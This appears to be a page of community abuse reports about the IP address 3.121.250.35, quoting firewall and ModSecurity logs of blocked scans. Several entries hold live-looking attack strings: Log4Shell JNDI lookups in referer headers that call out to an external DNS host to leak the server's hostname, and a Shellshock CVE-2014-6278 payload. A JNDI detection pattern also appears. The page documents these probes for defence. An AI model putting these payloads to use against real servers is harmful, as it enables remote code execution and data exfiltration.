๐บ๐ธ
TPI-Abuse
2026-05-14 11:21:24
(4 months ago)
(mod_security) mod_security (id:210492) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.com ...
show more
(mod_security) mod_security (id:210492) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 14 07:21:16.817631 2026] [security2:error] [pid 14581:tid 14581] [client 3.121.250.35:34181] ModSecurity: Access denied with code 403 (phase 1). Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.mavikalem.org"] [uri "/x3JJqwtz.htaccess~"] [unique_id "agWwLFz-WEXNrK4kkR6xMwAAAAw"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ซ๐ท
IRISIO
2025-12-19 19:08:55
(9 months ago)
scans/SQL injection/spam posts : 90 queries
SQL Injection
Web App Attack
๐ซ๐ท
IRISIO
2025-12-16 07:59:25
(9 months ago)
scans/SQL injection/spam posts : 68 queries
SQL Injection
Web App Attack
Anonymous
2025-12-15 14:48:18
(9 months ago)
3.121.250.35 - - [15/Dec/2025:15:48:12 +0100] "GET https://eosphoros.fr:443/MnWtS6Of.sql HTTP/1.1" 4 ...
show more
3.121.250.35 - - [15/Dec/2025:15:48:12 +0100] "GET https://eosphoros.fr:443/MnWtS6Of.sql HTTP/1.1" 404 104519 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
...
show less
Web App Attack
๐ฉ๐ช
NewWavesApp
2025-11-13 23:26:00
(10 months ago)
(mod_security) mod_security triggered on hostname [redacted] 3.121.250.35 (DE/Germany/ec2-3-121-250- ...
show more
(mod_security) mod_security triggered on hostname [redacted] 3.121.250.35 (DE/Germany/ec2-3-121-250-35.eu-central-1.compute.amazonaws.com)
show less
SQL Injection
๐บ๐ธ
TPI-Abuse
2025-04-22 11:03:21
(1 year ago)
(mod_security) mod_security (id:210730) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.com ...
show more
(mod_security) mod_security (id:210730) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Apr 22 07:03:14.104147 2025] [security2:error] [pid 3372436:tid 3372436] [client 3.121.250.35:41449] [client 3.121.250.35] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.mavikalem.org:443|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.mavikalem.org"] [uri "/7Tkztql8.LOG"] [unique_id "aAd3cmpKutV7Gzs--1eh4gAAAAc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
psauxit
2025-03-20 19:38:01
(1 year ago)
Fail2Ban - NGINX 403 forcing to access a restricted resource
Hacking
๐บ๐ธ
TPI-Abuse
2024-12-13 16:27:18
(1 year ago)
(mod_security) mod_security (id:210730) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.com ...
show more
(mod_security) mod_security (id:210730) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Dec 13 11:27:11.540074 2024] [security2:error] [pid 17759:tid 17759] [client 3.121.250.35:34885] [client 3.121.250.35] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.mavikalem.org:443|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.mavikalem.org"] [uri "/278Tci14.ini"] [unique_id "Z1xgX-KL5gTFeT--9vFEEwAAAAY"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-07-27 16:29:53
(2 years ago)
(mod_security) mod_security (id:248270) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.com ...
show more
(mod_security) mod_security (id:248270) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 27 12:29:50.394644 2024] [security2:error] [pid 24026:tid 24026] [client 3.121.250.35:45305] [client 3.121.250.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\\\$\\\\{(?:lower|upper)):" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||www.mavikalem.org|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.mavikalem.org"] [uri "/"] [unique_id "ZqUgfmCdjpulTC8e-3VLKwAAABY"], referer: https://${jndi:dns://Referer.${hostName}.0190f504-5a0e-334a-e5a4-4ff22f9db613.shm2jlgriwmdnqjz.onlayer.com/i48b58g}
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-02-02 07:02:00
(2 years ago)
(mod_security) mod_security (id:248270) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.com ...
show more
(mod_security) mod_security (id:248270) triggered by 3.121.250.35 (ec2-3-121-250-35.eu-central-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Feb 02 02:01:53.917633 2024] [security2:error] [pid 4602] [client 3.121.250.35:48165] [client 3.121.250.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\\\$\\\\{(?:lower|upper)):" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||www.mavikalem.org|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.mavikalem.org"] [uri "/"] [unique_id "ZbyTYUISEU0qG6MMv4GFqQAAAA4"], referer: https://${jndi:${lower:l}${lower:d}a${lower:p}://Referer.${hostName}.018d689f-4aea-510f-cc2c-631214eac8f7.shm2jlgriwmdnqjz.onlayer.com}
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2023-10-30 22:10:01
(2 years ago)
| Shellshock attack attempt
Hacking
SQL Injection
Web App Attack
๐ฉ๐ช
Thomas Lewis
2022-06-23 13:13:22
(4 years ago)
strange requests / referrers
GET /cgi-bin-sdb/sysinfo.pl
referrer: "() { _; } >_[$($())] { echo 9 ...
show more
strange requests / referrers
GET /cgi-bin-sdb/sysinfo.pl
referrer: "() { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }"
show less
Hacking
SQL Injection
Bad Web Bot
๐ฌ๐ง
UKFast Security
2022-01-14 11:33:03
(4 years ago)
Shellshock attack detected
Web App Attack